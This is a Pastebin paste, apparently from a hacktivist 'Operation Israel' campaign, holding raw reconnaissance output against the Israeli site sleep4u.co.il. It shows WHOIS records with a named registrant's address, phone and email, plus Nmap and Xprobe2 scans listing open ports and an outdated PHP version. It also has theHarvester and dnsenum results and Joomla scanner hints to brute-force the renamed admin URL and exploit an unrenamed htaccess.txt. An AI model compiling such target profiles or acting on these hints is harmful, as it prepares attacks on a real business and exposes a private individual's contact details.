Advertisement
Guest User

Anonymous Operation IsraelUSA JTSEC full recon #13

a guest
Dec 30th, 2017
705
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 189.11 KB | None | 0 0
  1. #######################################################################################################################################
  2. Hostname www.sleep4u.co.il ISP 012 Smile Communications LTD. (AS9116)
  3. Continent Asia Flag
  4. IL
  5. Country Israel Country Code IL (ISR)
  6. Region Unknown Local time 30 Dec 2017 22:29 IST
  7. City Unknown Latitude 31.5
  8. IP Address 62.128.59.221 Longitude 34.75
  9. #######################################################################################################################################
  10. [i] Scanning Site: http://sleep4u.co.il
  11.  
  12.  
  13.  
  14. B A S I C I N F O
  15. ====================
  16.  
  17.  
  18. [+] Site Title:
  19. [+] IP address: 62.128.59.221
  20. [+] Web Server: nginx
  21. [+] CMS: Could Not Detect
  22. [+] Cloudflare: Not Detected
  23. [+] Robots File: Found
  24.  
  25. -------------[ contents ]----------------
  26. User-agent: *
  27. Disallow: /cgi-bin/
  28. Disallow: /tmp/
  29.  
  30. -----------[end of contents]-------------
  31.  
  32.  
  33.  
  34. W H O I S L O O K U P
  35. ========================
  36.  
  37.  
  38. % The data in the WHOIS database of the .il registry is provided
  39. % by ISOC-IL for information purposes, and to assist persons in
  40. % obtaining information about or related to a domain name
  41. % registration record. ISOC-IL does not guarantee its accuracy.
  42. % By submitting a WHOIS query, you agree that you will use this
  43. % Data only for lawful purposes and that, under no circumstances
  44. % will you use this Data to: (1) allow, enable, or otherwise
  45. % support the transmission of mass unsolicited, commercial
  46. % advertising or solicitations via e-mail (spam);
  47. % or (2) enable high volume, automated, electronic processes that
  48. % apply to ISOC-IL (or its systems).
  49. % ISOC-IL reserves the right to modify these terms at any time.
  50. % By submitting this query, you agree to abide by this policy.
  51.  
  52. query: sleep4u.co.il
  53.  
  54. reg-name: sleep4u
  55. domain: sleep4u.co.il
  56.  
  57. descr: Gil Arberg
  58. descr: 51 Herzel St.
  59. descr: Tel Aviv
  60. descr: 66887
  61. descr: Israel
  62. phone: +972 3 6826596
  63. e-mail: nir.tmh AT gmail.com
  64. admin-c: DT-GE2579-IL
  65. tech-c: DT-GE2580-IL
  66. zone-c: DT-GE2581-IL
  67. nserver: ns1.spd.co.il
  68. nserver: ns2.spd.co.il
  69. validity: 10-05-2018
  70. DNSSEC: unsigned
  71. status: Transfer Locked
  72. changed: domain-registrar AT isoc.org.il 20050510 (Assigned)
  73. changed: domain-registrar AT isoc.org.il 20090421 (Transferred)
  74. changed: domain-registrar AT isoc.org.il 20090421 (Changed)
  75. changed: domain-registrar AT isoc.org.il 20090504 (Changed)
  76. changed: domain-registrar AT isoc.org.il 20090504 (Changed)
  77. changed: domain-registrar AT isoc.org.il 20090504 (Changed)
  78. changed: domain-registrar AT isoc.org.il 20090504 (Changed)
  79. changed: domain-registrar AT isoc.org.il 20090504 (Changed)
  80. changed: domain-registrar AT isoc.org.il 20100713 (Changed)
  81. changed: domain-registrar AT isoc.org.il 20120301 (Changed)
  82. changed: domain-registrar AT isoc.org.il 20120313 (Changed)
  83. changed: domain-registrar AT isoc.org.il 20120313 (Changed)
  84.  
  85. person: Gil Erenberg
  86. address: Gil Erenberg
  87. address: 51 Herzel St.
  88. address: Tel Aviv
  89. address: 66887
  90. address: Israel
  91. phone: +972 3 6826596
  92. fax-no: +972 3 6826596
  93. e-mail: nir.tmh AT gmail.com
  94. nic-hdl: DT-GE2579-IL
  95. changed: Managing Registrar 20120313
  96.  
  97. person: Gil Erenberg
  98. address: Gil Erenberg
  99. address: 51 Herzel St.
  100. address: Tel Aviv
  101. address: 66887
  102. address: Israel
  103. phone: +972 3 6826596
  104. fax-no: +972 3 6826596
  105. e-mail: nir.tmh AT gmail.com
  106. nic-hdl: DT-GE2580-IL
  107. changed: Managing Registrar 20120313
  108.  
  109. person: Gil Erenberg
  110. address: Gil Erenberg
  111. address: 51 Herzel St.
  112. address: Tel Aviv
  113. address: 66887
  114. address: Israel
  115. phone: +972 3 6826596
  116. fax-no: +972 3 6826596
  117. e-mail: nir.tmh AT gmail.com
  118. nic-hdl: DT-GE2581-IL
  119. changed: Managing Registrar 20120313
  120.  
  121. registrar name: Domain The Net Technologies Ltd
  122. registrar info: http://www.domainthenet.com
  123.  
  124. % Rights to the data above are restricted by copyright.
  125.  
  126.  
  127.  
  128.  
  129. G E O I P L O O K U P
  130. =========================
  131.  
  132. [i] IP Address: 62.128.59.221
  133. [i] Country: IL
  134. [i] State: HaMerkaz
  135. [i] City: Yavne
  136. [i] Latitude: 31.815599
  137. [i] Longitude: 34.720798
  138.  
  139.  
  140.  
  141.  
  142. H T T P H E A D E R S
  143. =======================
  144.  
  145.  
  146. [i] HTTP/1.1 302 Moved Temporarily
  147. [i] Server: nginx
  148. [i] Date: Sat, 30 Dec 2017 20:34:23 GMT
  149. [i] Content-Type: text/html
  150. [i] Content-Length: 154
  151. [i] Connection: close
  152. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  153. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  154. [i] Location: http://sleep4u.co.il/
  155. [i] X-Rocket-Nginx-Bypass: No
  156. [i] HTTP/1.1 302 Moved Temporarily
  157. [i] Server: nginx
  158. [i] Date: Sat, 30 Dec 2017 20:34:23 GMT
  159. [i] Content-Type: text/html
  160. [i] Content-Length: 154
  161. [i] Connection: close
  162. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  163. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  164. [i] Location: http://sleep4u.co.il/
  165. [i] X-Rocket-Nginx-Bypass: No
  166. [i] HTTP/1.1 302 Moved Temporarily
  167. [i] Server: nginx
  168. [i] Date: Sat, 30 Dec 2017 20:34:24 GMT
  169. [i] Content-Type: text/html
  170. [i] Content-Length: 154
  171. [i] Connection: close
  172. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  173. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  174. [i] Location: http://sleep4u.co.il/
  175. [i] X-Rocket-Nginx-Bypass: No
  176. [i] HTTP/1.1 302 Moved Temporarily
  177. [i] Server: nginx
  178. [i] Date: Sat, 30 Dec 2017 20:34:24 GMT
  179. [i] Content-Type: text/html
  180. [i] Content-Length: 154
  181. [i] Connection: close
  182. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  183. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  184. [i] Location: http://sleep4u.co.il/
  185. [i] X-Rocket-Nginx-Bypass: No
  186. [i] HTTP/1.1 302 Moved Temporarily
  187. [i] Server: nginx
  188. [i] Date: Sat, 30 Dec 2017 20:34:25 GMT
  189. [i] Content-Type: text/html
  190. [i] Content-Length: 154
  191. [i] Connection: close
  192. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  193. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  194. [i] Location: http://sleep4u.co.il/
  195. [i] X-Rocket-Nginx-Bypass: No
  196. [i] HTTP/1.1 302 Moved Temporarily
  197. [i] Server: nginx
  198. [i] Date: Sat, 30 Dec 2017 20:34:26 GMT
  199. [i] Content-Type: text/html
  200. [i] Content-Length: 154
  201. [i] Connection: close
  202. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  203. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  204. [i] Location: http://sleep4u.co.il/
  205. [i] X-Rocket-Nginx-Bypass: No
  206. [i] HTTP/1.1 302 Moved Temporarily
  207. [i] Server: nginx
  208. [i] Date: Sat, 30 Dec 2017 20:34:26 GMT
  209. [i] Content-Type: text/html
  210. [i] Content-Length: 154
  211. [i] Connection: close
  212. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  213. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  214. [i] Location: http://sleep4u.co.il/
  215. [i] X-Rocket-Nginx-Bypass: No
  216. [i] HTTP/1.1 302 Moved Temporarily
  217. [i] Server: nginx
  218. [i] Date: Sat, 30 Dec 2017 20:34:27 GMT
  219. [i] Content-Type: text/html
  220. [i] Content-Length: 154
  221. [i] Connection: close
  222. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  223. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  224. [i] Location: http://sleep4u.co.il/
  225. [i] X-Rocket-Nginx-Bypass: No
  226. [i] HTTP/1.1 302 Moved Temporarily
  227. [i] Server: nginx
  228. [i] Date: Sat, 30 Dec 2017 20:34:27 GMT
  229. [i] Content-Type: text/html
  230. [i] Content-Length: 154
  231. [i] Connection: close
  232. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  233. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  234. [i] Location: http://sleep4u.co.il/
  235. [i] X-Rocket-Nginx-Bypass: No
  236. [i] HTTP/1.1 302 Moved Temporarily
  237. [i] Server: nginx
  238. [i] Date: Sat, 30 Dec 2017 20:34:28 GMT
  239. [i] Content-Type: text/html
  240. [i] Content-Length: 154
  241. [i] Connection: close
  242. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  243. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  244. [i] Location: http://sleep4u.co.il/
  245. [i] X-Rocket-Nginx-Bypass: No
  246. [i] HTTP/1.1 302 Moved Temporarily
  247. [i] Server: nginx
  248. [i] Date: Sat, 30 Dec 2017 20:34:29 GMT
  249. [i] Content-Type: text/html
  250. [i] Content-Length: 154
  251. [i] Connection: close
  252. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  253. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  254. [i] Location: http://sleep4u.co.il/
  255. [i] X-Rocket-Nginx-Bypass: No
  256. [i] HTTP/1.1 302 Moved Temporarily
  257. [i] Server: nginx
  258. [i] Date: Sat, 30 Dec 2017 20:34:29 GMT
  259. [i] Content-Type: text/html
  260. [i] Content-Length: 154
  261. [i] Connection: close
  262. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  263. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  264. [i] Location: http://sleep4u.co.il/
  265. [i] X-Rocket-Nginx-Bypass: No
  266. [i] HTTP/1.1 302 Moved Temporarily
  267. [i] Server: nginx
  268. [i] Date: Sat, 30 Dec 2017 20:34:30 GMT
  269. [i] Content-Type: text/html
  270. [i] Content-Length: 154
  271. [i] Connection: close
  272. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  273. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  274. [i] Location: http://sleep4u.co.il/
  275. [i] X-Rocket-Nginx-Bypass: No
  276. [i] HTTP/1.1 302 Moved Temporarily
  277. [i] Server: nginx
  278. [i] Date: Sat, 30 Dec 2017 20:34:30 GMT
  279. [i] Content-Type: text/html
  280. [i] Content-Length: 154
  281. [i] Connection: close
  282. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  283. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  284. [i] Location: http://sleep4u.co.il/
  285. [i] X-Rocket-Nginx-Bypass: No
  286. [i] HTTP/1.1 302 Moved Temporarily
  287. [i] Server: nginx
  288. [i] Date: Sat, 30 Dec 2017 20:34:31 GMT
  289. [i] Content-Type: text/html
  290. [i] Content-Length: 154
  291. [i] Connection: close
  292. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  293. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  294. [i] Location: http://sleep4u.co.il/
  295. [i] X-Rocket-Nginx-Bypass: No
  296. [i] HTTP/1.1 302 Moved Temporarily
  297. [i] Server: nginx
  298. [i] Date: Sat, 30 Dec 2017 20:34:32 GMT
  299. [i] Content-Type: text/html
  300. [i] Content-Length: 154
  301. [i] Connection: close
  302. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  303. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  304. [i] Location: http://sleep4u.co.il/
  305. [i] X-Rocket-Nginx-Bypass: No
  306. [i] HTTP/1.1 302 Moved Temporarily
  307. [i] Server: nginx
  308. [i] Date: Sat, 30 Dec 2017 20:34:32 GMT
  309. [i] Content-Type: text/html
  310. [i] Content-Length: 154
  311. [i] Connection: close
  312. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  313. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  314. [i] Location: http://sleep4u.co.il/
  315. [i] X-Rocket-Nginx-Bypass: No
  316. [i] HTTP/1.1 302 Moved Temporarily
  317. [i] Server: nginx
  318. [i] Date: Sat, 30 Dec 2017 20:34:33 GMT
  319. [i] Content-Type: text/html
  320. [i] Content-Length: 154
  321. [i] Connection: close
  322. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  323. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  324. [i] Location: http://sleep4u.co.il/
  325. [i] X-Rocket-Nginx-Bypass: No
  326. [i] HTTP/1.1 302 Moved Temporarily
  327. [i] Server: nginx
  328. [i] Date: Sat, 30 Dec 2017 20:34:33 GMT
  329. [i] Content-Type: text/html
  330. [i] Content-Length: 154
  331. [i] Connection: close
  332. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  333. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  334. [i] Location: http://sleep4u.co.il/
  335. [i] X-Rocket-Nginx-Bypass: No
  336. [i] HTTP/1.1 302 Moved Temporarily
  337. [i] Server: nginx
  338. [i] Date: Sat, 30 Dec 2017 20:34:34 GMT
  339. [i] Content-Type: text/html
  340. [i] Content-Length: 154
  341. [i] Connection: close
  342. [i] Set-Cookie: SPDTC=f6b06a6df03894ef816b8933c97e95c9; path=/
  343. [i] P3P: CP="CUR ADM OUR NOR STA NID", policyref="/w3c/p3p.xml"
  344. [i] Location: http://sleep4u.co.il/
  345. [i] X-Rocket-Nginx-Bypass: No
  346.  
  347.  
  348.  
  349.  
  350. D N S L O O K U P
  351. ===================
  352.  
  353. sleep4u.co.il. 14399 IN SOA ns1.spd.co.il. hostmaster.sleep4u.co.il. 2017092803 14400 3600 1209600 86400
  354. sleep4u.co.il. 14399 IN NS ns2.spd.co.il.
  355. sleep4u.co.il. 14399 IN NS ns1.spd.co.il.
  356. sleep4u.co.il. 14399 IN A 62.128.59.221
  357. sleep4u.co.il. 14399 IN MX 10 mailgw2.spd.co.il.
  358. sleep4u.co.il. 14399 IN TXT "v=spf1 a mx ip4:84.95.150.75 ~all"
  359.  
  360.  
  361.  
  362.  
  363. S U B N E T C A L C U L A T I O N
  364. ====================================
  365.  
  366. Address = 62.128.59.221
  367. Network = 62.128.59.221 / 32
  368. Netmask = 255.255.255.255
  369. Broadcast = not needed on Point-to-Point links
  370. Wildcard Mask = 0.0.0.0
  371. Hosts Bits = 0
  372. Max. Hosts = 1 (2^0 - 0)
  373. Host Range = { 62.128.59.221 - 62.128.59.221 }
  374.  
  375.  
  376.  
  377. N M A P P O R T S C A N
  378. ============================
  379.  
  380.  
  381. Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-30 20:34 UTC
  382. Nmap scan report for sleep4u.co.il (62.128.59.221)
  383. Host is up (0.11s latency).
  384. rDNS record for 62.128.59.221: kiwi.spd.co.il
  385. PORT STATE SERVICE VERSION
  386. 21/tcp open ftp ProFTPD
  387. 22/tcp filtered ssh
  388. 23/tcp filtered telnet
  389. 25/tcp open smtp Exim smtpd
  390. 80/tcp open http nginx
  391. 110/tcp open pop3 Dovecot DirectAdmin pop3d
  392. 143/tcp open imap Dovecot imapd
  393. 443/tcp open ssl/http nginx
  394. 445/tcp filtered microsoft-ds
  395. 3389/tcp filtered ms-wbt-server
  396.  
  397. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  398. Nmap done: 1 IP address (1 host up) scanned in 16.79 seconds
  399. [!] IP Address : 62.128.59.221
  400. [!] Server: nginx
  401. [!] Powered By: PHP/5.2.17
  402. [-] Clickjacking protection is not in place.
  403. [+] Operating System : Windows"
  404. },
  405. "ports": [
  406. "995",
  407. "25",
  408. "143",
  409. "993",
  410. "443",
  411. "53",
  412. "110",
  413. "80",
  414. "21"
  415. ],
  416. "protocols": [
  417. "80/http",
  418. "993/imaps",
  419. "995/pop3s",
  420. "25/smtp",
  421. "110/pop3",
  422. "21/ftp",
  423. "143/imap",
  424. "53/dns",
  425. "443/https"
  426. ],
  427. "143": {
  428. "imap": {
  429. "starttls": {
  430. "tls": {
  431. "server_key_exchange": {
  432. "ecdh_params": {
  433. "curve_id": {
  434. "id": 23,
  435. "name": "secp256r1"
  436. }
  437. }
  438. },
  439. "certificate": {
  440. "parsed": {
  441. "fingerprint_sha1": "7a7e8e6ab2c5cd60a8d0fc5be5b8171f4d18ff73",
  442. "tbs_noct_fingerprint": "86bba376702a7da7e2e41a0b543f82d9de35b1f503bb2ef701c8ecf4e33887bc",
  443. "subj
  444. [!] www.sleep4u.co.il doesn't seem to use a CMS
  445. [+] Honeypot Probabilty: 30%
  446. ----------------------------------------
  447. PORT STATE SERVICE VERSION
  448. 21/tcp open ftp ProFTPD
  449. 22/tcp filtered ssh
  450. 23/tcp filtered telnet
  451. 25/tcp open smtp Exim smtpd
  452. 80/tcp open http nginx
  453. 110/tcp open pop3 Dovecot DirectAdmin pop3d
  454. 143/tcp open imap Dovecot imapd
  455. 443/tcp open ssl/http nginx
  456. 445/tcp filtered microsoft-ds
  457. 3389/tcp filtered ms-wbt-server
  458. ----------------------------------------
  459.  
  460. [+] DNS Records
  461.  
  462. [+] Host Records (A)
  463. www.sleep4u.co.ilHTTP: (kiwi.spd.co.il) (62.128.59.221) AS9116 012 Smile Communications LTD. Israel
  464.  
  465. [+] TXT Records
  466.  
  467. [+] DNS Map: https://dnsdumpster.com/static/map/www.sleep4u.co.il.png
  468.  
  469. [>] Initiating 3 intel modules
  470. [>] Loading Alpha module (1/3)
  471. [>] Beta module deployed (2/3)
  472. [>] Crawling the target for fuzzable URLs
  473. Target: http://sleep4u.co.il
  474.  
  475. Server: nginx
  476.  
  477.  
  478. ## NOTE: The Administrator URL was renamed. Bruteforce it. ##
  479. ## None of /administrator, /admin, /manage ##
  480.  
  481.  
  482. ## Checking if the target has deployed an Anti-Scanner measure
  483.  
  484. [!] Scanning Passed ..... OK
  485.  
  486.  
  487. ## Detecting Joomla! based Firewall ...
  488.  
  489. [!] A Joomla! jSecure Authentication is detected.
  490. [!] You need additional secret key to access /administrator directory
  491. [!] Default is jSecure like /administrator/?jSecure ;)
  492.  
  493.  
  494. ## Fingerprinting in progress ...
  495.  
  496. ~Unable to detect the version. Is it sure a Joomla?
  497.  
  498. ## Fingerprinting done.
  499.  
  500.  
  501.  
  502.  
  503. Vulnerabilities Discovered
  504. ==========================
  505.  
  506. # 1
  507. Info -> Generic: htaccess.txt has not been renamed.
  508. Versions Affected: Any
  509. Check: /htaccess.txt
  510. Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
  511. Vulnerable? Yes
  512. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  513. Server: 192.168.1.254
  514. Address: 192.168.1.254#53
  515.  
  516. Non-authoritative answer:
  517. Name: sleep4u.co.il
  518. Address: 62.128.59.221
  519.  
  520. sleep4u.co.il has address 62.128.59.221
  521. sleep4u.co.il mail is handled by 10 mailgw2.spd.co.il.
  522.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  523.  
  524. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  525.  
  526. [+] Target is sleep4u.co.il
  527. [+] Loading modules.
  528. [+] Following modules are loaded:
  529. [x] [1] ping:icmp_ping - ICMP echo discovery module
  530. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  531. [x] [3] ping:udp_ping - UDP-based ping discovery module
  532. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  533. [x] [5] infogather:portscan - TCP and UDP PortScanner
  534. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  535. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  536. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  537. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  538. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  539. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  540. [x] [12] fingerprint:smb - SMB fingerprinting module
  541. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  542. [+] 13 modules registered
  543. [+] Initializing scan engine
  544. [+] Running scan engine
  545. [-] ping:tcp_ping module: no closed/open TCP ports known on 62.128.59.221. Module test failed
  546. [-] ping:udp_ping module: no closed/open UDP ports known on 62.128.59.221. Module test failed
  547. [-] No distance calculation. 62.128.59.221 appears to be dead or no ports known
  548. [+] Host: 62.128.59.221 is down (Guess probability: 0%)
  549. [+] Cleaning up scan engine
  550. [+] Modules deinitialized
  551. [+] Execution completed.
  552.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  553.  
  554. % The data in the WHOIS database of the .il registry is provided
  555. % by ISOC-IL for information purposes, and to assist persons in
  556. % obtaining information about or related to a domain name
  557. % registration record. ISOC-IL does not guarantee its accuracy.
  558. % By submitting a WHOIS query, you agree that you will use this
  559. % Data only for lawful purposes and that, under no circumstances
  560. % will you use this Data to: (1) allow, enable, or otherwise
  561. % support the transmission of mass unsolicited, commercial
  562. % advertising or solicitations via e-mail (spam);
  563. % or (2) enable high volume, automated, electronic processes that
  564. % apply to ISOC-IL (or its systems).
  565. % ISOC-IL reserves the right to modify these terms at any time.
  566. % By submitting this query, you agree to abide by this policy.
  567.  
  568. query: sleep4u.co.il
  569.  
  570. reg-name: sleep4u
  571. domain: sleep4u.co.il
  572.  
  573. descr: Gil Arberg
  574. descr: 51 Herzel St.
  575. descr: Tel Aviv
  576. descr: 66887
  577. descr: Israel
  578. phone: +972 3 6826596
  579. e-mail: nir.tmh AT gmail.com
  580. admin-c: DT-GE2579-IL
  581. tech-c: DT-GE2580-IL
  582. zone-c: DT-GE2581-IL
  583. nserver: ns1.spd.co.il
  584. nserver: ns2.spd.co.il
  585. validity: 10-05-2018
  586. DNSSEC: unsigned
  587. status: Transfer Locked
  588. changed: domain-registrar AT isoc.org.il 20050510 (Assigned)
  589. changed: domain-registrar AT isoc.org.il 20090421 (Transferred)
  590. changed: domain-registrar AT isoc.org.il 20090421 (Changed)
  591. changed: domain-registrar AT isoc.org.il 20090504 (Changed)
  592. changed: domain-registrar AT isoc.org.il 20090504 (Changed)
  593. changed: domain-registrar AT isoc.org.il 20090504 (Changed)
  594. changed: domain-registrar AT isoc.org.il 20090504 (Changed)
  595. changed: domain-registrar AT isoc.org.il 20090504 (Changed)
  596. changed: domain-registrar AT isoc.org.il 20100713 (Changed)
  597. changed: domain-registrar AT isoc.org.il 20120301 (Changed)
  598. changed: domain-registrar AT isoc.org.il 20120313 (Changed)
  599. changed: domain-registrar AT isoc.org.il 20120313 (Changed)
  600.  
  601. person: Gil Erenberg
  602. address: Gil Erenberg
  603. address: 51 Herzel St.
  604. address: Tel Aviv
  605. address: 66887
  606. address: Israel
  607. phone: +972 3 6826596
  608. fax-no: +972 3 6826596
  609. e-mail: nir.tmh AT gmail.com
  610. nic-hdl: DT-GE2579-IL
  611. changed: Managing Registrar 20120313
  612.  
  613. person: Gil Erenberg
  614. address: Gil Erenberg
  615. address: 51 Herzel St.
  616. address: Tel Aviv
  617. address: 66887
  618. address: Israel
  619. phone: +972 3 6826596
  620. fax-no: +972 3 6826596
  621. e-mail: nir.tmh AT gmail.com
  622. nic-hdl: DT-GE2580-IL
  623. changed: Managing Registrar 20120313
  624.  
  625. person: Gil Erenberg
  626. address: Gil Erenberg
  627. address: 51 Herzel St.
  628. address: Tel Aviv
  629. address: 66887
  630. address: Israel
  631. phone: +972 3 6826596
  632. fax-no: +972 3 6826596
  633. e-mail: nir.tmh AT gmail.com
  634. nic-hdl: DT-GE2581-IL
  635. changed: Managing Registrar 20120313
  636.  
  637. registrar name: Domain The Net Technologies Ltd
  638. registrar info: http://www.domainthenet.com
  639.  
  640. % Rights to the data above are restricted by copyright.
  641.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  642.  
  643. *******************************************************************
  644. * *
  645. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  646. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  647. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  648. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  649. * *
  650. * TheHarvester Ver. 2.7 *
  651. * Coded by Christian Martorella *
  652. * Edge-Security Research *
  653. * cmartorella@edge-security.com *
  654. *******************************************************************
  655.  
  656.  
  657. Full harvest..
  658. [-] Searching in Google..
  659. Searching 0 results...
  660. Searching 100 results...
  661. Searching 200 results...
  662. [-] Searching in PGP Key server..
  663. [-] Searching in Bing..
  664. Searching 50 results...
  665. Searching 100 results...
  666. Searching 150 results...
  667. Searching 200 results...
  668. [-] Searching in Exalead..
  669. Searching 50 results...
  670. Searching 100 results...
  671. Searching 150 results...
  672. Searching 200 results...
  673. Searching 250 results...
  674.  
  675.  
  676. [+] Emails found:
  677. ------------------
  678. info@sleep4u.co.il
  679.  
  680. [+] Hosts found in search engines:
  681. ------------------------------------
  682. [-] Resolving hostnames IPs...
  683. 62.128.59.221:www.sleep4u.co.il
  684. [+] Virtual hosts:
  685. ==================
  686.  
  687. ******************************************************
  688. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
  689. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
  690. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
  691. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
  692. * |___/ *
  693. * Metagoofil Ver 2.2 *
  694. * Christian Martorella *
  695. * Edge-Security.com *
  696. * cmartorella_at_edge-security.com *
  697. ******************************************************
  698.  
  699. [-] Starting online search...
  700.  
  701. [-] Searching for doc files, with a limit of 200
  702. Searching 100 results...
  703. Searching 200 results...
  704. Results: 0 files found
  705. Starting to download 50 of them:
  706. ----------------------------------------
  707.  
  708.  
  709. [-] Searching for pdf files, with a limit of 200
  710. Searching 100 results...
  711. Searching 200 results...
  712. Results: 0 files found
  713. Starting to download 50 of them:
  714. ----------------------------------------
  715.  
  716.  
  717. [-] Searching for xls files, with a limit of 200
  718. Searching 100 results...
  719. Searching 200 results...
  720. Results: 0 files found
  721. Starting to download 50 of them:
  722. ----------------------------------------
  723.  
  724.  
  725. [-] Searching for csv files, with a limit of 200
  726. Searching 100 results...
  727. Searching 200 results...
  728. Results: 0 files found
  729. Starting to download 50 of them:
  730. ----------------------------------------
  731.  
  732.  
  733. [-] Searching for txt files, with a limit of 200
  734. Searching 100 results...
  735. Searching 200 results...
  736. Results: 0 files found
  737. Starting to download 50 of them:
  738. ----------------------------------------
  739.  
  740. processing
  741. user
  742. email
  743.  
  744. [+] List of users found:
  745. --------------------------
  746.  
  747. [+] List of software found:
  748. -----------------------------
  749.  
  750. [+] List of paths and servers found:
  751. ---------------------------------------
  752.  
  753. [+] List of e-mails found:
  754. ----------------------------
  755.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  756.  
  757. ; <<>> DiG 9.11.2-5-Debian <<>> -x sleep4u.co.il
  758. ;; global options: +cmd
  759. ;; Got answer:
  760. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 63640
  761. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  762.  
  763. ;; OPT PSEUDOSECTION:
  764. ; EDNS: version: 0, flags:; udp: 4096
  765. ;; QUESTION SECTION:
  766. ;il.co.sleep4u.in-addr.arpa. IN PTR
  767.  
  768. ;; AUTHORITY SECTION:
  769. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102519 1800 900 604800 3600
  770.  
  771. ;; Query time: 763 msec
  772. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  773. ;; WHEN: Sat Dec 30 21:27:51 EST 2017
  774. ;; MSG SIZE rcvd: 123
  775.  
  776. dnsenum VERSION:1.2.4
  777. 
  778. ----- sleep4u.co.il -----
  779. 
  780.  
  781. Host's addresses:
  782. __________________
  783.  
  784. sleep4u.co.il. 14300 IN A 62.128.59.221
  785. 
  786.  
  787. Name Servers:
  788. ______________
  789.  
  790. ns1.spd.co.il. 37874 IN A 212.199.164.175
  791. ns2.spd.co.il. 37874 IN A 80.179.148.8
  792. 
  793.  
  794. Mail (MX) Servers:
  795. ___________________
  796.  
